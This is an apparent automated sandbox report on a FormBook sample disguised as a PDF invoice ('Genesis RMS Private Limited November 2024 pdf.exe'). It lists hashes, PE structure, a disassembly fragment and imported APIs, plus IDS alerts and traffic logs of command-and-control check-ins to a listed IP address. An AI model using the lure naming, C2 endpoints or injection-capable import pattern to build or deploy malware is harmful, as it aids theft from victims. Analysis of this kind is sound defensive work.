                                                                                                                    la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 185.164.39.193
                                                                                                                    https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                                                                                                                    • 156.67.73.1
                                                                                                                    Bien nhan thanh toan Swift Message 38579130 VND8509509220_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.70
                                                                                                                    Ticari Siparis Belgesi 26 07 2024 17545000600.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.70
                                                                                                                    INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 156.67.74.121
                                                                                                                    Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 185.148.106.71
                                                                                                                    http://www.open-sora.orgGet hashmaliciousExela Stealer, Growtopia, Python StealerBrowse
                                                                                                                    • 156.67.75.29
                                                                                                                    OPs5j7Yjb8.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                    • 156.67.72.41
                                                                                                                    52cMXV8Al2.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 156.67.72.45
                                                                                                                    No context
                                                                                                                    No context
                                                                                                                    Process:C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):183784
                                                                                                                    Entropy (8bit):7.985787441060365
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:vUTrUQYErZE4hKf7OyW8IZLsoZuqCLRTlz2i94LjTypxrPYxxrnKlfK:vQQQreQS9rIZsLRTJreyr21nz
                                                                                                                    MD5:D752A39C241E8BF76C20DC3BBAAA8FBA
                                                                                                                    SHA1:92F38EEB31EFB207FCA39F293FCD6130220DDFE5
                                                                                                                    SHA-256:F24918F2CA896CB62CD81F0A4BF8E137DCCECA4174699EBE882436F967360344
                                                                                                                    SHA-512:6118C5B26A5DF2FC3B4E4534C4F24F92D6491A5197D96ECF4D9BFF4E9A32DA11D780218F80DA2C04572D88081351C5581B45B0B6829726338518191F2C983427
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:EA06.....Zn..."sD..x...+.....4./....~.R.Y..*4...7.S.....gL... ......{3.O0...B+...e2.]..(......N_T.U.r[.Cq..*.....t..u..F[...*vp...vS...]U........%..h8...U<..)Z.W..S..h.....7.D.2...V..B|q.j.|..&s.z..-...6...T..b.Y...8...1..l....'5@.b.Q..'....3...cSA.Th`.X.R.;).2J.Y.%..A...b......} .....V.P@... ......Z.:aZ.,.l3.m\.k.F..............p.o....\.[....p....'.....9.....6^./7I...^F....l...>7...z..$..C.{.t...#5.u.T_...c..z.~5..........Y?..'..L...jg...N'O.....^.&..vl....G!.Bj...f.N...(.....a`..Ob...}f..V>o...9....g3..(....M..W..9.....i./..92......7e..Mg....1.aht..G..ct..c.p.}.5..J...P.p...aQ.b..y......f...Jw......[.c..,gZ.E.p!3...{...............u[.z....9U.f....&.J...{..[.{..53.~~....M..g .`...]Z......X.~....qd....AI...M....ji..Lf}..8.L....k....J.:.F&1M..i..@.]....1....?.P.D'.K...q.t.S....l.v#..ls{r...ZH....Q1........Y..A../u}.q..Oy..."#..C....[qu..7.m........$.c...;...?k..s6t......P..+...S.~.L.KX...0JO.QI.`.|kU[..C...O.y`..<......&...2....+.H...
Process: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe
File Type: data
Category: dropped
Size (bytes): 189440
Entropy (8bit): 7.864607275669974
Encrypted: false
SSDEEP: 3072:0a6IgZQeKY6LtLZqkpEXAIrih0R0hA31A4Gougjk3ZWb7cjJYCKzOMbAVvc4laK:TdJLZEXAJaR0J4GoyA7cjYAu2aK
MD5: 7279B22723723592552FC3E38F2F68BC
SHA1: 8E0769470B786FB5BF5DDFE73783C78EF278F1C3
SHA-256: CA23B42A26A496F2EF80560D4C66F176137CB6E61C44D74228DE9E04A685E383
SHA-512: 72BA52CA7D87CB06FBF6C21CAD9DE4177A9F650764A42F1461FDCE86116517C07D20248B88E174EC314A2342456E1A836AB98F487973520F998E436CFD41457D
Malicious: false
Reputation: low
                                                                                                                    Preview:.iv..H9DQ...X.....N3....O=...QYCDQAA8M7ZN0JY33L5H9DQYCDQAA8.7ZN>U.=3.<...P..e.)(KmG(!W88^./T&W+%y!!q34Vm^4nt...^#Q-.I\SgDQAA8M7.8...U..._...%..A...<..J....S..D...7..Q._..V.Y33L5H9DQYCDQAA8.rZN|KX3<.^.9DQYCDQA.8O6QO:JY.1L5H9DQYCD.@8M'ZN0.[33LuH9TQYCFQAD8L7ZN0J\32L5H9DQ.ADQCA8M7ZN2J..3L%H9TQYCDAAA(M7ZN0JI33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JwGV4AH9DE.ADQQA8M.XN0ZY33L5H9DQYCDQAa8MWZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQYCDQAA8M7ZN0JY33L5H9DQY
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.010988750082187
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Genesis RMS Private Limited November 2024 pdf.exe
File size: 1'086'464 bytes
MD5: a03815195e40a8caf9e0da80eccb9240
SHA1: f770dbb9f49ad2f03955a2c5a8c70373652d2ba9
SHA256: 1477618f7a47c1e6cef99ff4626f541de642a01ec9219290d3a92546abc21c9e
SHA512: d62156ed630fee3830832151f42adc6f9ae9fbc48497cf3a54a70759121a583168bf60db85ae50d3964183a72eacd1eea4c187b82c2ba2a67cee675332fa997f
SSDEEP: 24576:fAHnh+eWsN3skA4RV1Hom2KXMmHaCH6m3kVjM4615:Ch+ZkldoPK8YaC53kZY
TLSH: D535AD0273D1C036FFAB92739B6AF64196BC79254133852F13981DB9BD701B2263E663
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                                                                                    Icon Hash:aaf3e3e3938382a0
                                                                                                                    Entrypoint:0x42800a
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x674585C1 [Tue Nov 26 08:24:33 2024 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:1
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:1
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:1
                                                                                                                    Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                                                                                    Instruction
                                                                                                                    call 00007F070D1272BDh
                                                                                                                    jmp 00007F070D11A074h
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [esp+10h]
                                                                                                                    mov ecx, dword ptr [esp+14h]
                                                                                                                    mov edi, dword ptr [esp+0Ch]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007F070D11A1FAh
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007F070D11A55Eh
                                                                                                                    bt dword ptr [004C41FCh], 01h
                                                                                                                    jnc 00007F070D11A1F9h
                                                                                                                    rep movsb
                                                                                                                    jmp 00007F070D11A50Ch
                                                                                                                    cmp ecx, 00000080h
                                                                                                                    jc 00007F070D11A3C4h
                                                                                                                    mov eax, edi
                                                                                                                    xor eax, esi
                                                                                                                    test eax, 0000000Fh
                                                                                                                    jne 00007F070D11A200h
                                                                                                                    bt dword ptr [004BF324h], 01h
                                                                                                                    jc 00007F070D11A6D0h
                                                                                                                    bt dword ptr [004C41FCh], 00000000h
                                                                                                                    jnc 00007F070D11A39Dh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007F070D11A3AEh
                                                                                                                    test esi, 00000003h
                                                                                                                    jne 00007F070D11A38Dh
                                                                                                                    bt edi, 02h
                                                                                                                    jnc 00007F070D11A1FFh
                                                                                                                    mov eax, dword ptr [esi]
                                                                                                                    sub ecx, 04h
                                                                                                                    lea esi, dword ptr [esi+04h]
                                                                                                                    mov dword ptr [edi], eax
                                                                                                                    lea edi, dword ptr [edi+04h]
                                                                                                                    bt edi, 03h
                                                                                                                    jnc 00007F070D11A203h
                                                                                                                    movq xmm1, qword ptr [esi]
                                                                                                                    sub ecx, 08h
                                                                                                                    lea esi, dword ptr [esi+08h]
                                                                                                                    movq qword ptr [edi], xmm1
                                                                                                                    lea edi, dword ptr [edi+08h]
                                                                                                                    test esi, 00000007h
                                                                                                                    je 00007F070D11A255h
                                                                                                                    bt esi, 03h
                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2013 build 21005
                                                                                                                    • [ C ] VS2013 build 21005
                                                                                                                    • [C++] VS2013 build 21005
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [IMP] VS2008 SP1 build 30729
                                                                                                                    • [ASM] VS2013 UPD5 build 40629
                                                                                                                    • [RES] VS2013 build 21005
                                                                                                                    • [LNK] VS2013 UPD5 build 40629
                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x3ec94.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1070000x7134.reloc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc8000 | 0x3ec94 | 0x3ee00 | f23483e7cad02130113af67d45da9bfc | False | 0.8948962475149106 | data | 7.816023510148309 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x107000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd07b8 | 0x35f59 | data | | | 1.0003438649515648
RT_GROUP_ICON | 0x106714 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x10678c | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1067a0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1067b4 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1067c8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1068a4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-26T11:17:18.647765+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49909 | 156.67.73.254 | 80 | TCP
2024-11-26T11:17:18.647765+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49909 | 156.67.73.254 | 80 | TCP
2024-11-26T11:17:18.647765+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49909 | 156.67.73.254 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 11:17:17.500309944 CET | 49909 | 80 | 192.168.2.4 | 156.67.73.254
Nov 26, 2024 11:17:17.620445967 CET | 80 | 49909 | 156.67.73.254 | 192.168.2.4
Nov 26, 2024 11:17:17.620521069 CET | 49909 | 80 | 192.168.2.4 | 156.67.73.254
Nov 26, 2024 11:17:17.620672941 CET | 49909 | 80 | 192.168.2.4 | 156.67.73.254
Nov 26, 2024 11:17:17.740788937 CET | 80 | 49909 | 156.67.73.254 | 192.168.2.4
Nov 26, 2024 11:17:18.136533022 CET | 49909 | 80 | 192.168.2.4 | 156.67.73.254
Nov 26, 2024 11:17:18.297616959 CET | 80 | 49909 | 156.67.73.254 | 192.168.2.4
Nov 26, 2024 11:17:18.646579027 CET | 80 | 49909 | 156.67.73.254 | 192.168.2.4
Nov 26, 2024 11:17:18.647764921 CET | 49909 | 80 | 192.168.2.4 | 156.67.73.254
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 11:15:35.403584003 CET | 65509 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:15:35.825655937 CET | 53 | 65509 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:15:53.964972019 CET | 49961 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:15:54.329902887 CET | 53 | 49961 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:16:14.435009956 CET | 53221 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:16:14.665364981 CET | 53 | 53221 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:16:35.129565001 CET | 60856 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:16:35.537247896 CET | 53 | 60856 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:16:56.262780905 CET | 54911 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:16:56.466669083 CET | 53 | 54911 | 1.1.1.1 | 192.168.2.4
Nov 26, 2024 11:17:16.927644968 CET | 61808 | 53 | 192.168.2.4 | 1.1.1.1
Nov 26, 2024 11:17:17.494760036 CET | 53 | 61808 | 1.1.1.1 | 192.168.2.4
